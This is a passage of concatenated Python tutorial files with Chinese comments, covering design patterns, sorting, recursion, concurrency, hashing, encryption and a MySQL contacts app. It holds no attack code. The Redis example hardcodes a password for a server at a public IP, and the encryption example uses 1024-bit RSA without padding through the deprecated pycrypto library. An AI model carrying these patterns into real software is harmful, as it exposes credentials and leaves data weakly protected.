**kwargs) return cls.__instance class President(metaclass=SingletonMeta): """总统(单例类)""" def __init__(self, name, country): self.name = name 
self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): """主函数""" p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') p3 = President.__call__('克林顿', '美国') print(p1 == p2) print(p1 == p3) print(p1, p2, p3, sep='\n') if __name__ == '__main__': main() File: Day16-20/code/example08.py """ 加密和解密 对称加密 - 加密和解密是同一个密钥 - DES / AES 非对称加密 - 加密和解密是不同的密钥 - RSA pip install pycrypto """ import base64 from hashlib import md5 from Crypto.Cipher import AES from Crypto import Random from Crypto.PublicKey import RSA # # AES加密的密钥(长度32个字节) # key = md5(b'1qaz2wsx').hexdigest() # # AES加密的初始向量(随机生成) # iv = Random.new().read(AES.block_size) def main(): """主函数""" # 生成密钥对 key_pair = RSA.generate(1024) # 导入公钥 pub_key = RSA.importKey(key_pair.publickey().exportKey()) # 导入私钥 pri_key = RSA.importKey(key_pair.exportKey()) message1 = 'hello, world!' # 加密数据 data = pub_key.encrypt(message1.encode(), None) # 对加密数据进行BASE64编码 message2 = base64.b64encode(data[0]) print(message2) # 对加密数据进行BASE64解码 data = base64.b64decode(message2) # 解密数据 message3 = pri_key.decrypt(data) print(message3.decode()) # # AES - 对称加密 # str1 = '我爱你们!' # cipher = AES.new(key, AES.MODE_CFB, iv) # # 加密 # str2 = cipher.encrypt(str1) # print(str2) # # 解密 # cipher = AES.new(key, AES.MODE_CFB, iv) # str3 = cipher.decrypt(str2) # print(str3.decode()) if __name__ == '__main__': main() File: Day16-20/code/test_example01.py """ 单元测试 - 针对程序中最小的功能模块(函数和方法)的测试 测试方法: - 白盒测试:程序自己写的测试 - 黑盒测试:测试人员或QA,不知道代码实现细节,只关注功能 编写Python单元测试 - 定义类继承TestCase,写测试方法(test_开头) 执行单元测试: - unittest.main() - python3 -m unittest test_example01.py 第三方库 - nose2 / pytest pip install pytest pytest-cov pytest -v --cov ------------------------------ pip install nose2 cov-core nose2 -v -C """ from unittest import TestCase from example01 import seq_search, bin_search class TestExample01(TestCase): """测试查找函数的测试用例""" # 执行每个测试函数之前要执行的方法 def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.data2 = [12, 35, 40, 55, 68, 73, 81, 97] # 执行每个测试函数之后要执行的方法 def tearDown(self): pass def test_seq_search(self): """测试顺序查找""" self.assertEqual(0, seq_search(self.data1, 35)) self.assertEqual(2, seq_search(self.data1, 12)) self.assertEqual(6, seq_search(self.data1, 81)) self.assertEqual(7, seq_search(self.data1, 40)) self.assertEqual(-1, seq_search(self.data1, 99)) self.assertEqual(-1, seq_search(self.data1, 7)) def test_bin_search(self): """测试二分查找""" self.assertEqual(1, bin_search(self.data2, 35)) self.assertEqual(0, bin_search(self.data2, 12)) self.assertEqual(6, bin_search(self.data2, 81)) self.assertEqual(2, bin_search(self.data2, 40)) self.assertEqual(7, bin_search(self.data2, 97)) self.assertEqual(-1, bin_search(self.data2, 7)) self.assertEqual(-1, bin_search(self.data2, 99)) File: Day16-20/code/example23.py """ 协程(coroutine)- 可以在需要时进行切换的相互协作的子程序 """ import asyncio from example15 import is_prime def num_generator(m, n): """指定范围的数字生成器""" yield from range(m, n + 1) async def prime_filter(m, n): """素数过滤器""" primes = [] for i in num_generator(m, n): if is_prime(i): print('Prime =>', i) primes.append(i) await asyncio.sleep(0.001) return tuple(primes) async def square_mapper(m, n): """平方映射器""" squares = [] for i in num_generator(m, n): print('Square =>', i * i) squares.append(i * i) await asyncio.sleep(0.001) return squares def main(): """主函数""" loop = asyncio.get_event_loop() future = asyncio.gather(prime_filter(2, 100), square_mapper(1, 100)) future.add_done_callback(lambda x: print(x.result())) loop.run_until_complete(future) loop.close() if __name__ == '__main__': 
main() File: Day16-20/code/example17.py """ 多重继承 - 一个类有两个或者两个以上的父类 MRO - 方法解析顺序 - Method Resolution Order 当出现菱形继承(钻石继承)的时候,子类到底继承哪个父类的方法 Python 2.x - 深度优先搜索 Python 3.x - C3算法 - 类似于广度优先搜索 """ class A(): def say_hello(self): print('Hello, A') class B(A): pass class C(A): def say_hello(self): print('Hello, C') class D(B, C): pass class SetOnceMappingMixin(): """自定义混入类""" __slots__ = () def __setitem__(self, key, value): if key in self: raise KeyError(str(key) + ' already set') return super().__setitem__(key, value) class SetOnceDict(SetOnceMappingMixin, dict): """自定义字典""" pass def main(): print(D.mro()) # print(D.__mro__) D().say_hello() print(SetOnceDict.__mro__) my_dict= SetOnceDict() my_dict['username'] = 'jackfrued' my_dict['username'] = 'hellokitty' if __name__ == '__main__': main() File: Day16-20/code/example07.py """ 哈希摘要 - 数字签名/指纹 - 单向哈希函数(没有反函数不可逆) 应用领域: 1. 数据库中的用户敏感信息保存成哈希摘要 2. 给数据生成签名验证数据没有被恶意篡改 3. 云存储服务的秒传功能(去重功能) """ class StreamHasher(): """摘要生成器""" def __init__(self, algorithm='md5', size=4096): """初始化方法 @params: algorithm - 哈希摘要算法 size - 每次读取数据的大小 """ self.size = size cls = getattr(__import__('hashlib'), algorithm.lower()) self.hasher = cls() def digest(self, file_stream): """生成十六进制的摘要字符串""" # data = file_stream.read(self.size) # while data: # self.hasher.update(data) # data = file_stream.read(self.size) for data in iter(lambda: file_stream.read(self.size), b''): self.hasher.update(data) return self.hasher.hexdigest() def __call__(self, file_stream): return self.digest(file_stream) def main(): """主函数""" hasher1 = StreamHasher() hasher2 = StreamHasher('sha1') hasher3 = StreamHasher('sha256') with open('Python-3.7.2.tar.xz', 'rb') as file_stream: print(hasher1.digest(file_stream)) file_stream.seek(0, 0) print(hasher2.digest(file_stream)) file_stream.seek(0, 0) print(hasher3(file_stream)) if __name__ == '__main__': main() File: Day16-20/code/example13.py from example12 import EmployeeFactory def main(): """主函数""" emps = [ EmployeeFactory.create('M', '曹操'), EmployeeFactory.create('P', '荀彧', 120), EmployeeFactory.create('P', '郭嘉', 85), EmployeeFactory.create('S', '典韦', 123000), ] for emp in emps: print('%s: %.2f元' % (emp.name, emp.get_salary())) if __name__ == '__main__': main() File: Day16-20/code/example03.py """ 函数递归调用 - 函数直接或者间接的调用了自身 1. 收敛条件 2. 递归公式 n! = n * (n-1)! f(n) = f(n-1) + f(n-2) 1 1 2 3 5 8 13 21 34 55 ... 
""" from contextlib import contextmanager from time import perf_counter def fac(num): """求阶乘""" assert num >= 0 if num in (0, 1): return 1 return num * fac(num - 1) def fib2(num): """普通函数""" a, b = 1, 1 for _ in range(num - 1): a, b = b, a + b return a def fib3(num): """生成器""" a, b = 0, 1 for _ in range(num): a, b = b, a + b yield a # 动态规划 - 保存可能进行重复运算的中间结果(空间换时间) def fib(num, results={}): """斐波拉切数""" assert num > 0 if num in (1, 2): return 1 try: return results[num] except KeyError: results[num] = fib(num - 1) + fib(num - 2) return results[num] @contextmanager def timer(): try: start = perf_counter() yield finally: end = perf_counter() print(f'{end - start}秒') def main(): """主函数""" # for val in fib3(20): # print(val) # gen = fib3(20) # for _ in range(10): # print(next(gen)) for num in range(1, 121): with timer(): print(f'{num}: {fib(num)}') # print(fac(5)) # print(fac(-5)) if __name__ == '__main__': main() File: Day16-20/code/example12.py """ 面向对象的三大支柱:封装、继承、多态 面向对象的设计原则:SOLID原则 面向对象的设计模式:GoF设计模式(单例、工厂、代理、策略、迭代器) 月薪结算系统 - 部门经理每月15000 程序员每小时200 销售员1800底薪加销售额5%提成 """ from abc import ABCMeta, abstractmethod class Employee(metaclass=ABCMeta): """员工(抽象类)""" def __init__(self, name): self.name = name @abstractmethod def get_salary(self): """结算月薪(抽象方法)""" pass class Manager(Employee): """部门经理""" def get_salary(self): return 15000.0 class Programmer(Employee): """程序员""" def __init__(self, name, working_hour=0): self.working_hour = working_hour super().__init__(name) def get_salary(self): return 200.0 * self.working_hour class Salesman(Employee): """销售员""" def __init__(self, name, sales=0.0): self.sales = sales super().__init__(name) def get_salary(self): return 1800.0 + self.sales * 0.05 class EmployeeFactory(): """创建员工的工厂(工厂模式 - 通过工厂实现对象使用者和对象之间的解耦合)""" @staticmethod def create(emp_type, *args, **kwargs): """创建员工""" emp_type = emp_type.upper() emp = None if emp_type == 'M': emp = Manager(*args, **kwargs) elif emp_type == 'P': emp = Programmer(*args, **kwargs) elif emp_type == 'S': emp = Salesman(*args, **kwargs) return emp File: Day16-20/code/example02.py """ 排序 - 冒泡排序、选择排序、归并排序、快速排序 冒泡排序 - O(n ** 2):两两比较,大的下沉 35, 97, 12, 68, 55, 73, 81, 40 35, 12, 68, 55, 73, 81, 40, [97] 12, 35, 55, 68, 73, 40, [81] 12, 35, 55, 68, 40, [73] ... 
选择排序 - O(n ** 2):每次从剩下元素中选择最小 ----------------------------------------- 归并排序 - O(n * log_2 n) - 高级排序算法 35, 97, 12, 68, 55, 73, 81, 40 [35, 97, 12, 68], [55, 73, 81, 40] [35, 97], [12, 68], [55, 73], [81, 40] [35], [97], [12], [68], [55], [73], [81], [40] [35, 97], [12, 68], [55, 73], [40, 81] [12, 35, 68, 97], [40, 55, 73, 81] [12, 35, 40, 55, 68, 73, 81, 97] ----------------------------------------- 快速排序 - 以枢轴为界将列表中的元素划分为两个部分,左边都比枢轴小,右边都比枢轴大 35, 97, 12, 68, 55, 73, 81, 40 35, 12, [40], 68, 55, 73, 81, 97 [12], 35, [40], 68, 55, 73, 81, [97] [12], 35, [40], 55, [68], 73, 81, [97] [12], 35, [40], 55, [68], 73, [81], [97] """ class Person(object): """人""" def __init__(self, name, age): self.name = name self.age = age # def __gt__(self, other): # return self.name > other.name def __str__(self): return f'{self.name}: {self.age}' def __repr__(self): return self.__str__() def select_sort(origin_items, comp=lambda x, y: x < y): """简单选择排序""" items = origin_items[:] for i in range(len(items) - 1): min_index = i for j in range(i + 1, len(items)): if comp(items[j], items[min_index]): min_index = j items[i], items[min_index] = items[min_index], items[i] return items # 函数的设计要尽量做到无副作用(不影响调用者) # 9 1 2 3 4 5 6 7 8 # 9 2 3 4 5 6 7 8 1 # *前面的参数叫位置参数,传参时只需要对号入座即可 # *后面的参数叫命名关键字参数,传参时必须给出参数名和参数值 # *args - 可变参数 - 元组 # **kwargs - 关键字参数 - 字典 def bubble_sort(origin_items, *, comp=lambda x, y: x > y): """冒泡排序""" items = origin_items[:] for i in range(1, len(items)): swapped = False for j in range(i - 1, len(items) - i): if comp(items[j], items[j + 1]): items[j], items[j + 1] = items[j + 1], items[j] swapped = True if swapped: swapped = False for j in range(len(items) - i - 1, i - 1, -1): if comp(items[j - 1], items[j]): items[j], items[j - 1] = items[j - 1], items[j] swapped = True if not swapped: break return items def merge_sort(items, comp=lambda x, y: x <= y): """归并排序""" if len(items) < 2: return items[:] mid = len(items) // 2 left = merge_sort(items[:mid], comp) right = merge_sort(items[mid:], comp) return merge(left, right, comp) def merge(items1, items2, comp=lambda x, y: x <= y): """合并(将两个有序列表合并成一个新的有序列表)""" items = [] index1, index2 = 0, 0 while index1 < len(items1) and index2 < len(items2): if comp(items1[index1], items2[index2]): items.append(items1[index1]) index1 += 1 else: items.append(items2[index2]) index2 += 1 items += items1[index1:] items += items2[index2:] return items def quick_sort(origin_items, comp=lambda x, y: x <= y): """快速排序""" items = origin_items[:] _quick_sort(items, 0, len(items) - 1, comp) return items def _quick_sort(items, start, end, comp): """递归调用划分和排序""" if start < end: pos = _partition(items, start, end, comp) _quick_sort(items, start, pos - 1, comp) _quick_sort(items, pos + 1, end, comp) def _partition(items, start, end, comp): """划分""" pivot = items[end] i = start - 1 for j in range(start, end): if comp(items[j], pivot): i += 1 items[i], items[j] = items[j], items[i] items[i + 1], items[end] = items[end], items[i + 1] return i + 1 def main(): """主函数""" items = [35, 97, 12, 68, 55, 73, 81, 40] # print(bubble_sort(items)) # print(select_sort(items)) # print(merge_sort(items)) print(quick_sort(items)) items2 = [ Person('Wang', 25), Person('Luo', 39), Person('Zhang', 50), Person('He', 20) ] # print(bubble_sort(items2, comp=lambda p1, p2: p1.age > p2.age)) # print(select_sort(items2, comp=lambda p1, p2: p1.name < p2.name)) # print(merge_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) print(quick_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) items3 = ['apple', 'orange', 
'watermelon', 'durian', 'pear'] # print(bubble_sort(items3)) # print(bubble_sort(items3, comp=lambda x, y: len(x) > len(y))) # print(merge_sort(items3)) print(merge_sort(items3)) if __name__ == '__main__': main() File: Day16-20/code/example22.py """ 多进程和进程池的使用 多线程因为GIL的存在不能够发挥CPU的多核特性 对于计算密集型任务应该考虑使用多进程 time python3 example22.py real 0m11.512s user 0m39.319s sys 0m0.169s """ import concurrent.futures import math PRIMES = [ 1116281, 1297337, 104395303, 472882027, 533000389, 817504243, 982451653, 112272535095293, 112582705942171, 112272535095293, 115280095190773, 115797848077099, 1099726899285419 ] * 5 def is_prime(n): """判断素数""" if n % 2 == 0: return False sqrt_n = int(math.floor(math.sqrt(n))) for i in range(3, sqrt_n + 1, 2): if n % i == 0: return False return True def main(): """主函数""" with concurrent.futures.ProcessPoolExecutor() as executor: for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)): print('%d is prime: %s' % (number, prime)) if __name__ == '__main__': main() File: Day16-20/code/example16.py """ 魔术方法 如果要把自定义对象放到set或者用作dict的键 那么必须要重写__hash__和__eq__两个魔术方法 前者用来计算对象的哈希码,后者用来判断两个对象是否相同 哈希码不同的对象一定是不同的对象,但哈希码相同未必是相同的对象(哈希码冲撞) 所以在哈希码相同的时候还要通过__eq__来判定对象是否相同 """ class Student(): __slots__ = ('stuid', 'name', 'gender') def __init__(self, stuid, name): self.stuid = stuid self.name = name def __hash__(self): return hash(self.stuid) + hash(self.name) def __eq__(self, other): return self.stuid == other.stuid and \ self.name == other.name def __str__(self): return f'{self.stuid}: {self.name}' def __repr__(self): return self.__str__() class School(): def __init__(self, name): self.name = name self.students = {} def __setitem__(self, key, student): self.students[key] = student def __getitem__(self, key): return self.students[key] def main(): # students = set() # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '白元芳')) # print(len(students)) # print(students) stu = Student(1234, '骆昊') stu.gender = 'Male' # stu.birth = '1980-11-28' print(stu.name, stu.birth) school = School('千锋教育') school[1001] = Student(1001, '王大锤') school[1002] = Student(1002, '白元芳') school[1003] = Student(1003, '白洁') print(school[1002]) print(school[1003]) if __name__ == '__main__': main() File: Day16-20/code/example06.py """ 编码和解码 - BASE64 0-9A-Za-z+/ 1100 0101 1001 0011 0111 0110 00110001 00011001 00001101 00110110 base64 b64encode / b64decode ------------------------------------- 序列化和反序列化 序列化 - 将对象变成字节序列(bytes)或者字符序列(str) - 串行化/腌咸菜 反序列化 - 把字节序列或者字符序列还原成对象 Python标准库对序列化的支持: json - 字符形式的序列化 pickle - 字节形式的序列化 dumps / loads """ import base64 import json import redis from example02 import Person class PersonJsonEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ def main(): cli = redis.StrictRedis(host='120.77.222.217', port=6379, password='123123') data = base64.b64decode(cli.get('guido')) with open('guido2.jpg', 'wb') as file_stream: file_stream.write(data) # with open('guido.jpg', 'rb') as file_stream: # result = base64.b64encode(file_stream.read()) # cli.set('guido', result) # persons = [ # Person('骆昊', 39), Person('王大锤', 18), # Person('白元芳', 25), Person('狄仁杰', 37) # ] # persons = json.loads(cli.get('persons')) # print(persons) # cli.set('persons', json.dumps(persons, cls=PersonJsonEncoder)) if __name__ == '__main__': main() File: Day16-20/code/example11.py """ 变量的作用域以及Python搜索变量的顺序 LEGB: Local --> Embedded --> Global --> Built-in global - 声明或定义全局变量(要么直接使用现有的全局作用域的变量,要么定义一个变量放到全局作用域) nonlocal - 声明使用嵌套作用域的变量(如果嵌套作用域没有对应的变量直接报错) """ x = 100 def 
foo(): global x x = 200 def bar(): x = 300 print(x) bar() print(x) foo() print(x) File: Day16-20/code/example01.py """ 查找 - 顺序查找和二分查找 算法:解决问题的方法(步骤) 评价一个算法的好坏主要有两个指标:渐近时间复杂度和渐近空间复杂度,通常一个算法很难做到时间复杂度和空间复杂度都很低(因为时间和空间是不可调和的矛盾) 表示渐近时间复杂度通常使用大O标记 O(c):常量时间复杂度 - 哈希存储 / 布隆过滤器 O(log_2 n):对数时间复杂度 - 折半查找 O(n):线性时间复杂度 - 顺序查找 O(n * log_2 n):- 对数线性时间复杂度 - 高级排序算法(归并排序、快速排序) O(n ** 2):平方时间复杂度 - 简单排序算法(冒泡排序、选择排序、插入排序) O(n ** 3):立方时间复杂度 - Floyd算法 / 矩阵乘法运算 也称为多项式时间复杂度 O(2 ** n):几何级数时间复杂度 - 汉诺塔 O(3 ** n):几何级数时间复杂度 也称为指数时间复杂度 O(n!):阶乘时间复杂度 - 旅行经销商问题 - NP """ from math import log2, factorial from matplotlib import pyplot import numpy def seq_search(items: list, elem) -> int: """顺序查找""" for index, item in enumerate(items): if elem == item: return index return -1 def bin_search(items, elem): """二分查找""" start, end = 0, len(items) - 1 while start <= end: mid = (start + end) // 2 if elem > items[mid]: start = mid + 1 elif elem < items[mid]: end = mid - 1 else: return mid return -1 def main(): """主函数(程序入口)""" num = 6 styles = ['r-.', 'g-*', 'b-o', 'y-x', 'c-^', 'm-+', 'k-d'] legends = ['对数', '线性', '线性对数', '平方', '立方', '几何级数', '阶乘'] x_data = [x for x in range(1, num + 1)] y_data1 = [log2(y) for y in range(1, num + 1)] y_data2 = [y for y in range(1, num + 1)] y_data3 = [y * log2(y) for y in range(1, num + 1)] y_data4 = [y ** 2 for y in range(1, num + 1)] y_data5 = [y ** 3 for y in range(1, num + 1)] y_data6 = [3 ** y for y in range(1, num + 1)] y_data7 = [factorial(y) for y in range(1, num + 1)] y_datas = [y_data1, y_data2, y_data3, y_data4, y_data5, y_data6, y_data7] for index, y_data in enumerate(y_datas): pyplot.plot(x_data, y_data, styles[index]) pyplot.legend(legends) pyplot.xticks(numpy.arange(1, 7, step=1)) pyplot.yticks(numpy.arange(0, 751, step=50)) pyplot.show() if __name__ == '__main__': main() File: Day16-20/code/example21.py """ 多个线程竞争一个资源 - 保护临界资源 - 锁(Lock/RLock) 多个线程竞争多个资源(线程数>资源数) - 信号量(Semaphore) 多个线程的调度 - 暂停线程执行/唤醒等待中的线程 - Condition """ from concurrent.futures import ThreadPoolExecutor from random import randint from time import sleep import threading class Account(): """银行账户""" def __init__(self, balance=0): self.balance = balance lock = threading.Lock() self.condition = threading.Condition(lock) def withdraw(self, money): """取钱""" with self.condition: while money > self.balance: self.condition.wait() new_balance = self.balance - money sleep(0.001) self.balance = new_balance def deposit(self, money): """存钱""" with self.condition: new_balance = self.balance + money sleep(0.001) self.balance = new_balance self.condition.notify_all() def add_money(account): while True: money = randint(5, 10) account.deposit(money) print(threading.current_thread().name, ':', money, '====>', account.balance) sleep(0.5) def sub_money(account): while True: money = randint(10, 30) account.withdraw(money) print(threading.current_thread().name, ':', money, '<====', account.balance) sleep(1) def main(): account = Account() with ThreadPoolExecutor(max_workers=10) as pool: for _ in range(5): pool.submit(add_money, account) pool.submit(sub_money, account) if __name__ == '__main__': main() File: Day16-20/code/example15.py """ 迭代器 - __iter__ / __next__ itertools - 生成可迭代序列的工具模块 """ import itertools from math import sqrt def is_prime(num): """判断素数""" for factor in range(2, int(sqrt(num)) + 1): if num % factor == 0: return False return True class PrimeIter(object): """素数迭代器""" def __init__(self, min_value, max_value): assert 2 <= min_value <= max_value self.min_value = min_value - 1 self.max_value = max_value def __iter__(self): return 
self def __next__(self): self.min_value += 1 while self.min_value <= self.max_value: if is_prime(self.min_value): return self.min_value self.min_value += 1 raise StopIteration() class FibIter(object): """斐波那契数迭代器""" def __init__(self, num): self.num = num self.a, self.b = 0, 1 self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.num: self.a, self.b = self.b, self.a + self.b self.idx += 1 return self.a raise StopIteration() def main(): # for val in itertools.permutations('ABCD'): # print(val) # for val in itertools.combinations('ABCDE', 3): # print(val) # for val in itertools.product('黑红梅方', range(1, 14)): # print(val) # fib_iter = FibIter(20) # print('===>', next(fib_iter)) # print('===>', next(fib_iter)) # for val in fib_iter: # print(val) prime_iter = PrimeIter(2, 100000) for val in prime_iter: print(val) if __name__ == '__main__': main() File: Day16-20/code/example05.py """ 递归回溯法:叫称为试探法,按选优条件向前搜索,当搜索到某一步, 发现原先选择并不优或达不到目标时,就退回一步重新选择。 经典问题:骑士巡逻 """ import os import sys import time SIZE = 5 total = 0 def print_board(board): # os.system('clear') for row in board: for col in row: print(str(col).center(4), end='') print() def patrol(board, row, col, step=1): if row >= 0 and row < SIZE and \ col >= 0 and col < SIZE and \ board[row][col] == 0: board[row][col] = step if step == SIZE * SIZE: global total total += 1 print(f'第{total}种走法: ') print_board(board) patrol(board, row - 2, col - 1, step + 1) patrol(board, row - 1, col - 2, step + 1) patrol(board, row + 1, col - 2, step + 1) patrol(board, row + 2, col - 1, step + 1) patrol(board, row + 2, col + 1, step + 1) patrol(board, row + 1, col + 2, step + 1) patrol(board, row - 1, col + 2, step + 1) patrol(board, row - 2, col + 1, step + 1) board[row][col] = 0 def main(): board = [[0] * SIZE for _ in range(SIZE)] patrol(board, SIZE - 1, SIZE - 1) if __name__ == '__main__': main() File: Day16-20/code/example20.py """ 线程间通信(共享数据)非常简单因为可以共享同一个进程的内存 进程间通信(共享数据)比较麻烦因为操作系统会保护分配给进程的内存 要实现多进程间的通信通常可以用系统管道、套接字、三方服务来实现 multiprocessing.Queue 守护线程 - daemon thread 守护进程 - firewalld / httpd / mysqld 在系统停机的时候不保留的进程 - 不会因为进程还没有执行结束而阻碍系统停止 """ from threading import Thread from time import sleep def output(content): while True: print(content, end='') def main(): Thread(target=output, args=('Ping', ), daemon=True).start() Thread(target=output, args=('Pong', ), daemon=True).start() sleep(5) print('bye!') if __name__ == '__main__': main() File: Day16-20/code/example14.py """ 面向对象 枚举 - 一个变量的值只有有限个选择,最适合的类型就是枚举 通过枚举我们可以定义符号常量,符号常量优于字面常量 """ from enum import Enum, unique import random @unique class Suite(Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) def __lt__(self, other): return self.value < other.value class Card(): """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): return self.__str__() def __str__(self): suites = ('♠️', '♥️', '♣️', '♦️') faces = ('', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K') return f'{suites[self.suite.value]} {faces[self.face]}' class Poker(): """扑克""" def __init__(self): self.index = 0 self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] def shuffle(self): """洗牌""" self.index = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.index] self.index += 1 return card @property def has_more(self): """是否有更多的牌""" return self.index < len(self.cards) class Player(): """玩家""" def __init__(self, name): self.name = name self.cards = [] def get_card(self, card): """摸牌""" self.cards.append(card) def 
arrange(self): """整理手上的牌""" self.cards.sort(key=lambda card: (card.suite, card.face)) def main(): """主函数""" poker = Poker() poker.shuffle() players = [ Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐') ] while poker.has_more: for player in players: player.get_card(poker.deal()) for player in players: player.arrange() print(player.name, end=': ') print(player.cards) if __name__ == '__main__': main() File: Day16-20/code/example04.py """ 贪婪法:在对问题求解时,总是做出在当前看来是最好的选择, 不追求最优解,快速找到满意解。 """ class Thing(object): """物品""" def __init__(self, name, price, weight): self.name = name self.price = price self.weight = weight @property def value(self): """价格重量比""" return self.price / self.weight def input_thing(): """输入物品信息""" name_str, price_str, weight_str = input().split() return name_str, int(price_str), int(weight_str) def main(): """主函数""" max_weight, num_of_things = map(int, input().split()) all_things = [] for _ in range(num_of_things): all_things.append(Thing(*input_thing())) all_things.sort(key=lambda x: x.value, reverse=True) total_weight = 0 total_price = 0 for thing in all_things: if total_weight + thing.weight <= max_weight: print(f'小偷拿走了{thing.name}') total_weight += thing.weight total_price += thing.price print(f'总价值: {total_price}美元') if __name__ == '__main__': main() File: Day16-20/code/example10.py """ 装饰类的装饰器 - 单例模式 - 一个类只能创建出唯一的对象 上下文语法: __enter__ / __exit__ """ import threading from functools import wraps def singleton(cls): """单例装饰器""" instances = {} lock = threading.Lock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] return wrapper @singleton class President(): def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): print(President.__name__) p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') print(p1 == p2) print(p1) print(p2) if __name__ == '__main__': main() File: Day16-20/code/example24.py """ aiohttp - 异步HTTP网络访问 异步I/O(异步编程)- 只使用一个线程(单线程)来处理用户请求 用户请求一旦被接纳,剩下的都是I/O操作,通过多路I/O复用也可以达到并发的效果 这种做法与多线程相比可以让CPU利用率更高,因为没有线程切换的开销 Redis/Node.js - 单线程 + 异步I/O Celery - 将要执行的耗时间的任务异步化处理 异步I/O事件循环 - uvloop """ import asyncio import re import aiohttp async def fetch(session, url): async with session.get(url, ssl=False) as resp: return await resp.text() async def main(): pattern = re.compile(r'\<title\>(?P<title>.*)\<\/title\>') urls = ('https://www.python.org/', 'https://git-scm.com/', 'https://www.jd.com/', 'https://www.taobao.com/', 'https://www.douban.com/') async with aiohttp.ClientSession() as session: for url in urls: html = await fetch(session, url) print(pattern.search(html).group('title')) if __name__ == '__main__': loop = asyncio.get_event_loop() loop.run_until_complete(main()) loop.close() File: Day16-20/code/test_example02.py from unittest import TestCase from example02 import select_sort, merge class TestExample02(TestCase): """测试排序函数的测试用例""" def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.items1 = [12, 35, 68, 97] self.items2 = [40, 55, 73, 81] def test_merge(self): items = merge(self.items1, self.items2) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) def test_select_sort(self): """测试顺序查找""" items = select_sort(self.data1) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) File: Day36-45/code/contact/main.py """ -- 创建名为address的数据库 create database address default charset utf8; -- 切换到address数据库 use 
address; -- 创建联系人表tb_contacter create table tb_contacter ( conid int auto_increment comment '编号', conname varchar(31) not null comment '姓名', contel varchar(15) default '' comment '电话', conemail varchar(255) default'' comment '邮箱', primary key (conid) ); """ import pymysql INSERT_CONTACTER = """ insert into tb_contacter (conname, contel, conemail) values (%s, %s, %s) """ DELETE_CONTACTER = """ delete from tb_contacter where conid=%s """ UPDATE_CONTACTER = """ update tb_contacter set conname=%s, contel=%s, conemail=%s where conid=%s """ SELECT_CONTACTERS = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter limit %s offset %s """ SELECT_CONTACTERS_BY_NAME = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter where conname like %s """ COUNT_CONTACTERS = """ select count(conid) as total from tb_contacter """ class Contacter(object): def __init__(self, id, name, tel, email): self.id = id self.name = name self.tel = tel self.email = email def input_contacter_info(): name = input('姓名: ') tel = input('手机: ') email = input('邮箱: ') return name, tel, email def add_new_contacter(con): name, tel, email = input_contacter_info() try: with con.cursor() as cursor: if cursor.execute(INSERT_CONTACTER, (name, tel, email)) == 1: print('添加联系人成功!') except pymysql.MySQLError as err: print(err) print('添加联系人失败!') def delete_contacter(con, contacter): try: with con.cursor() as cursor: if cursor.execute(DELETE_CONTACTER, (contacter.id, )) == 1: print('联系人已经删除!') except pymysql.MySQLError as err: print(err) print('删除联系人失败!') def edit_contacter_info(con, contacter): name, tel, email = input_contacter_info() contacter.name = name or contacter.name contacter.tel = tel or contacter.tel contacter.email = email or contacter.email try: with con.cursor() as cursor: if cursor.execute(UPDATE_CONTACTER, (contacter.name, contacter.tel, contacter.email, contacter.id)) == 1: print('联系人信息已经更新!') except pymysql.MySQLError as err: print(err) print('更新联系人信息失败!') def show_contacter_detail(con, contacter): print('姓名:', contacter.name) print('手机号:', contacter.tel) print('邮箱:', contacter.email) choice = input('是否编辑联系人信息?(yes|no)') if choice == 'yes': edit_contacter_info(con, contacter) else: choice = input('是否删除联系人信息?(yes|no)') if choice == 'yes': delete_contacter(con, contacter) def show_search_result(con, cursor): contacters_list = [] for index, row in enumerate(cursor.fetchall()): contacter = Contacter(**row) contacters_list.append(contacter) print('[%d]: %s' % (index, contacter.name)) if len(contacters_list) > 0: choice = input('是否查看联系人详情?(yes|no)') if choice.lower() == 'yes': index = int(input('请输入编号: ')) if 0 <= index < cursor.rowcount: show_contacter_detail(con, contacters_list[index]) def find_all_contacters(con): page, size = 1, 5 try: with con.cursor() as cursor: cursor.execute(COUNT_CONTACTERS) total = cursor.fetchone()['total'] while True: cursor.execute(SELECT_CONTACTERS, (size, (page - 1) * size)) show_search_result(con, cursor) if page * size < total: choice = input('继续查看下一页?(yes|no)') if choice.lower() == 'yes': page += 1 else: break else: print('没有下一页记录!') break except pymysql.MySQLError as err: print(err) def find_contacters_by_name(con): name = input('联系人姓名: ') try: with con.cursor() as cursor: cursor.execute(SELECT_CONTACTERS_BY_NAME, ('%' + name + '%', )) show_search_result(con, cursor) except pymysql.MySQLError as err: print(err) def find_contacters(con): while True: print('1. 查看所有联系人') print('2. 搜索联系人') print('3. 
